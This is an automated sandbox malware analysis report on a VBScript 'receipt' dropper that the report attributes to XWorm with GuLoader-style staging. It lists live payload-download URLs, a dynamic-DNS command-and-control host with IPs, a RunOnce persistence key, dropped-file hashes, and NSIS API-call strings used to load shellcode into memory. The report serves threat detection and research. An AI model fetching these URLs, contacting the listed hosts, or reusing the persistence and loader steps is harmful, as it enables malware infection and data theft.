        Security Account Manager221
        Security Software Discovery
        SMB/Windows Admin Shares1
        Clipboard Data
        1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        NTDS31
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading
        LSA Secrets1
        Application Window Discovery
        SSHKeylogging213
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
        Virtualization/Sandbox Evasion
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534152 Sample: c56D7_Receipt.vbs Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 30 xwor3july.duckdns.org 2->30 32 apslline.com 2->32 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Yara detected XWorm 2->40 44 6 other signatures 2->44 8 wscript.exe 2 2->8         started        signatures3 42 Uses dynamic DNS services 30->42 process4 dnsIp5 34 apslline.com 103.53.40.62, 443, 49730, 49737 PUBLIC-DOMAIN-REGISTRYUS India 8->34 24 C:\ProgramData\filaucioso.bat, PE32 8->24 dropped 48 System process connects to network (likely due to code injection or exploit) 8->48 50 Benign windows process drops PE files 8->50 52 VBScript performs obfuscated calls to suspicious functions 8->52 54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->54 13 filaucioso.bat 47 8->13         started        file6 signatures7 process8 file9 26 C:\Users\user\AppData\Local\...\System.dll, PE32 13->26 dropped 56 Drops PE files with a suspicious file extension 13->56 58 Tries to detect virtualization through RDTSC time measurements 13->58 60 Switches to a custom stack to bypass stack traces 13->60 17 filaucioso.bat 1 11 13->17         started        signatures10 process11 dnsIp12 28 xwor3july.duckdns.org 12.221.146.138, 49755, 9402 ATT-INTERNET4US United States 17->28 22 C:\Users\user\AppData\Local\...\Busaos.pif, PE32 17->22 dropped 46 Installs a global keyboard hook 17->46 file13 signatures14

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        c56D7_Receipt.vbs0%ReversingLabs
        SourceDetectionScannerLabelLink
        C:\ProgramData\filaucioso.bat8%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif8%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        apslline.com
        103.53.40.62
        truetrue
          unknown
          xwor3july.duckdns.org
          12.221.146.138
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://apslline.com/Motocrossbanerne37.piftrue
              unknown
              https://apslline.com/LfGiMdRCMSvlQHkIpf170.bintrue
                unknown
                xwor3july.duckdns.orgtrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://apslline.com:443/Motocrossbanerne37.pifwscript.exe, 00000000.00000003.1790076467.0000020E76E71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792192545.0000020E76E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790768918.0000020E76E78000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://apslline.com/Motocrossbanerne37.pifQwscript.exe, 00000000.00000003.1791259002.0000020E78E70000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://nsis.sf.net/NSIS_Errorfilaucioso.bat, filaucioso.bat, 00000005.00000000.2022571987.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat.0.dr, Busaos.pif.5.drfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorwscript.exe, 00000000.00000003.1778774215.0000020E79077000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000001.00000000.1781880896.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat, 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmp, filaucioso.bat, 00000005.00000000.2022571987.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat.0.dr, Busaos.pif.5.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apslline.com/wscript.exe, 00000000.00000002.1792928891.0000020E78FA4000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000005.00000002.3009633630.0000000003476000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://apslline.com/Motocrossbanerne37.pifkwscript.exe, 00000000.00000002.1792100540.0000020E76DB9000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefilaucioso.bat, 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://apslline.com/Motocrossbanerne37.pif:Uwscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            103.53.40.62
                            apslline.comIndia
                            394695PUBLIC-DOMAIN-REGISTRYUStrue
                            12.221.146.138
                            xwor3july.duckdns.orgUnited States
                            7018ATT-INTERNET4UStrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1534152
                            Start date and time:2024-10-15 16:36:17 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:c56D7_Receipt.vbs
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winVBS@5/28@5/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 91
                            • Number of non-executed functions: 69
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: c56D7_Receipt.vbs
                            TimeTypeDescription
                            10:37:19API Interceptor2x Sleep call for process: wscript.exe modified
                            10:38:06API Interceptor1012599x Sleep call for process: filaucioso.bat modified
                            15:37:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Afmystificeringen C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif
                            15:38:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Afmystificeringen C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            103.53.40.62https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0Get hashmaliciousHTMLPhisherBrowse
                              12.221.146.13817230659061f7212c82a51474b4881c633df451e130ec6cfbd94355d94352086b239967195549.dat-decoded.exeGet hashmaliciousPureLog StealerBrowse
                                17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  Paymentxx212093.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                    17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      Paymentxx212093.vbsGet hashmaliciousXWormBrowse
                                        hvnmaynew.exeGet hashmaliciousPureLog StealerBrowse
                                          hvnmaynew.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                            temp2.vbsGet hashmaliciousGuLoaderBrowse
                                              temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                171691854703bf1130ca78ef4041ee58d9950902e1c0a124d93965554ad493b7cef0815bd3441.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ATT-INTERNET4UShttp://youutbe.comGet hashmaliciousUnknownBrowse
                                                  • 98.98.135.24
                                                  https://escuelazoe.com.ar/.5#support@dotcloud.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                  • 13.32.27.129
                                                  na.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 70.137.157.149
                                                  na.elfGet hashmaliciousMirai, GafgytBrowse
                                                  • 13.165.162.220
                                                  na.elfGet hashmaliciousMirai, GafgytBrowse
                                                  • 99.119.72.226
                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 76.201.253.144
                                                  na.elfGet hashmaliciousMirai, GafgytBrowse
                                                  • 108.239.35.103
                                                  https://mcafeeinc-mkt-prod2-t.adobe-campaign.com/r/?id=hf505ba5a,7e223f22,7e22536b&e=cDE9JmFmZmlkPTAmY3VsdHVyZT1FTi1VUyZ0az1OUEdkMGVLcjd3SG1jVnF2cHQ2RFpYY3FIbHZlc3lGV1hZN3R5a0ZDTGJWX210NUlTX09UaTEwa291MG15NkZqMCZ0cD02NSZhdD14dXVlczNIRXpPbk45bE5wZzFoMnlFSEpTNnlSSnQxMk4xSzA3N2pHR083QTRYdVdQTzNlNXZmLVdKcUFQQzZYMCZwMj0wMjQvXzAgX29sX2lzX1NlbmRMaW5rX0tleUNhcmRfRE0zMzY4MDkwJnAzPURNMzM2ODA5MA&s=JTMn_G5VW0V9WjEy6_Fw8uIaCQd67lmwdVLQnjaD0bAGet hashmaliciousUnknownBrowse
                                                  • 13.42.96.26
                                                  na.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 172.124.148.33
                                                  na.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 162.206.178.39
                                                  PUBLIC-DOMAIN-REGISTRYUSIMG0001.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.224
                                                  Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 207.174.215.249
                                                  PO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.198.143
                                                  Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 207.174.215.249
                                                  https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052Get hashmaliciousPhisherBrowse
                                                  • 208.91.199.114
                                                  0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 119.18.54.39
                                                  Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.225
                                                  AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 103.21.58.10
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1Doc047892345y.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • 103.53.40.62
                                                  meczK67xaL.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 103.53.40.62
                                                  SWIFT COPY..PAYMENT ADVICE.xlsGet hashmaliciousUnknownBrowse
                                                  • 103.53.40.62
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 103.53.40.62
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 103.53.40.62
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 103.53.40.62
                                                  SecuriteInfo.com.Win32.PWSX-gen.1475.22419.exeGet hashmaliciousLummaCBrowse
                                                  • 103.53.40.62
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 103.53.40.62
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 103.53.40.62
                                                  lfyJfb6jSS.exeGet hashmaliciousLummaCBrowse
                                                  • 103.53.40.62
                                                  37f463bf4616ecd445d4a1937da06e191-Ordine lavorazione esterna_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 103.53.40.62
                                                  RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 103.53.40.62
                                                  8861299486_INV_AWB_SOF_001_20241015_120755.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 103.53.40.62
                                                  rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 103.53.40.62
                                                  VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                  • 103.53.40.62
                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                  • 103.53.40.62
                                                  Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                  • 103.53.40.62
                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                  • 103.53.40.62
                                                  Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 103.53.40.62
                                                  Prximos VencimientosPDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 103.53.40.62
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dllhttps://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exeGet hashmaliciousUnknownBrowse
                                                    5006_2.6.2.exeGet hashmaliciousUnknownBrowse
                                                      ocs-office.exeGet hashmaliciousUnknownBrowse
                                                        jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          jU0hAXFL0k.exeGet hashmaliciousGuLoaderBrowse
                                                            #U4e5d#U6708#U58f0#U660e_40981677.xlsGet hashmaliciousGuLoaderBrowse
                                                              MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                MaMsKRmgXZ.exeGet hashmaliciousGuLoaderBrowse
                                                                  Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
                                                                    3CoQ2gnbIu.exeGet hashmaliciousGuLoaderBrowse
                                                                      Process:C:\Windows\System32\wscript.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):5329718
                                                                      Entropy (8bit):7.979774478767476
                                                                      Encrypted:false
                                                                      SSDEEP:98304:EH//4Q0gBDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIf/Yapu5koUe:0BD4aUgZLhj3gZj67xHRnFpu5kPe
                                                                      MD5:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                      SHA1:F3B91AA55B8DCE62CB614E2A43D8E3973B1D47B6
                                                                      SHA-256:7FD5435121F2CB4320B1BC49400152EC3FECCE7F5CE0ACCE56F32C327126C970
                                                                      SHA-512:46808E4D79D0D1FBE2835456DAF31E0DE9E8F296B7863F38400EAA03FBF33BE450F92DF16F9B77AC5BB95AA33A97D484C1C678891C6E13B151F9CB7865C99BE7
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................?...........@.................................0........`;.x............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata... ...@:..........................rsrc...x....`;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29
                                                                      Entropy (8bit):3.598349098128234
                                                                      Encrypted:false
                                                                      SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                      MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                      SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                      SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                      SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:....### explorer ###..[WIN]r
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):5329718
                                                                      Entropy (8bit):7.979774478767476
                                                                      Encrypted:false
                                                                      SSDEEP:98304:EH//4Q0gBDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIf/Yapu5koUe:0BD4aUgZLhj3gZj67xHRnFpu5kPe
                                                                      MD5:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                      SHA1:F3B91AA55B8DCE62CB614E2A43D8E3973B1D47B6
                                                                      SHA-256:7FD5435121F2CB4320B1BC49400152EC3FECCE7F5CE0ACCE56F32C327126C970
                                                                      SHA-512:46808E4D79D0D1FBE2835456DAF31E0DE9E8F296B7863F38400EAA03FBF33BE450F92DF16F9B77AC5BB95AA33A97D484C1C678891C6E13B151F9CB7865C99BE7
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................?...........@.................................0........`;.x............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata... ...@:..........................rsrc...x....`;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):56
                                                                      Entropy (8bit):4.286618146008852
                                                                      Encrypted:false
                                                                      SSDEEP:3:sAAEVvjsvdxE584n:fL9P
                                                                      MD5:2B322A53D90A2271FFF01BF0834A5FD9
                                                                      SHA1:DA3FB0F558C75C2FE3D0BD7C9C19705B72B57D3D
                                                                      SHA-256:C30C98B13BB40861BA5B1CD08CC1018D11C0E9B0C95716A8A0D7B8E0B863CEB9
                                                                      SHA-512:F0B775FEF5150A7824FE25320F0FB1C383BAFC1AF7AC79E2E3CC7E791D4F296C44755A5A56BD4DFEEF8D0C9F913B5F9CF5B4AD8487FDC1163DF82050EE64521B
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:kernel32::ReadFile(i r5, i r1, i 23674880,*i 0, i 0)i.r3
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):11776
                                                                      Entropy (8bit):5.854901984552606
                                                                      Encrypted:false
                                                                      SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                      MD5:0063D48AFE5A0CDC02833145667B6641
                                                                      SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                      SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                      SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: , Detection: malicious, Browse
                                                                      • Filename: 5006_2.6.2.exe, Detection: malicious, Browse
                                                                      • Filename: ocs-office.exe, Detection: malicious, Browse
                                                                      • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                      • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                      • Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse
                                                                      • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                      • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                      • Filename: Part_number_91875-11400_x_6.xls, Detection: malicious, Browse
                                                                      • Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):74
                                                                      Entropy (8bit):3.9637832956585757
                                                                      Encrypted:false
                                                                      SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                      MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                      SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                      SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                      SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.483822629187616
                                                                      Encrypted:false
                                                                      SSDEEP:3:sEMBQEJkJVEj9id7EVUxQoXUn:uVmxvUn
                                                                      MD5:57FCC15EFB7333330E4CE43A197A823F
                                                                      SHA1:66BD1A4B000CF26B6E568CACDDA0E9F88C28F899
                                                                      SHA-256:30A71BBB38285BAEA3079D8868EE88C97C988727E3A139528FC153291328E394
                                                                      SHA-512:C1B9FDA9BA474F6FF65A37656C8CDDF072556A2EEF653DD043FE1E3AE89E1AE8311AA0433BBB5C989912EDBB21C85ED70F6866AB6957C83B88A085CCC4AE0316
                                                                      Malicious:false
                                                                      Preview:kernel32::VirtualAlloc(i 0,i 23674880, i 0x3000, i 0x40)p.r1
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):30
                                                                      Entropy (8bit):4.256564762130954
                                                                      Encrypted:false
                                                                      SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                      MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                      SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                      SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                      SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                      Malicious:false
                                                                      Preview:user32::EnumWindows(i r1 ,i 0)
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):52
                                                                      Entropy (8bit):4.0914493934217315
                                                                      Encrypted:false
                                                                      SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                      MD5:5D04A35D3950677049C7A0CF17E37125
                                                                      SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                      SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                      SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                      Malicious:false
                                                                      Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):44084
                                                                      Entropy (8bit):1.251987965137089
                                                                      Encrypted:false
                                                                      SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                      MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                      SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                      SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                      SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                      Malicious:false
                                                                      Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):495473
                                                                      Entropy (8bit):1.252683728528738
                                                                      Encrypted:false
                                                                      SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                      MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                      SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                      SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                      SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
                                                                      Malicious:false
